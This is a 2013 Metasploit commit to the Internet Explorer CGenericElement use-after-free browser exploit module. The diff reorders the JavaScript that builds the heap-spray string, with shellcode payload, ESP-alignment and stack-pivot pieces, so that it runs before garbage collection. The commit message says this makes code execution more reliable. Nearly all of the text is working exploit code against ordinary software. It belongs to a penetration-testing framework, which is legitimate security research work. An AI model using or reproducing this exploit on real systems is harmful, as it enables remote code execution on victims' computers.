A slight change for stability

While updating ie_cgenericelement_uaf earlier today, I noticed the changes made it a tiny bit less stable. Juan's test log in rapid7#1809 also kinda shows that (with the first attempt failing), so I decided to go back and move the string crafting part, that way between CollectGarbage() and the overwrite, there is less noise, and hopefully more stable. I did a few tests, seems better.
dougsko · Jun 20, 2013 · ee7f36f · ee7f36f
1 parent ff9d6a6
commit ee7f36f
Showing 1 changed file with 16 additions and 16 deletions.
diff --git a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
@@ -227,6 +227,22 @@ def load_exploit_html(my_target, cli)
 
 		function helloWorld()
 		{
+			sparkle = unescape("ABCD");
+			for (i=0; i < 2; i++) {
+				sparkle += unescape("ABCD");
+			}
+			sparkle += unescape("AB");
+			sparkle += unescape("#{js_payload}");
+
+			magenta = unescape("#{align_esp}");
+
+			for (i=0; i < 0x70/4; i++) {
+				if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
+				else               { magenta += unescape("#{align_esp}"); }
+			}
+
+			magenta += sparkle;
+
 			f0 = document.createElement('span');
 			document.body.appendChild(f0);
 			f1 = document.createElement('span');
@@ -246,22 +262,6 @@ def load_exploit_html(my_target, cli)
 			f1.innerHTML = "";
 
 			CollectGarbage();
-
-			sparkle = unescape("ABCD");
-			for (i=0; i < 2; i++) {
-				sparkle += unescape("ABCD");
-			}
-			sparkle += unescape("AB");
-			sparkle += unescape("#{js_payload}");
-
-			magenta = unescape("#{align_esp}");
-
-			for (i=0; i < 0x70/4; i++) {
-				if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
-				else               { magenta += unescape("#{align_esp}"); }
-			}
-
-			magenta += sparkle;
 			mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
 		}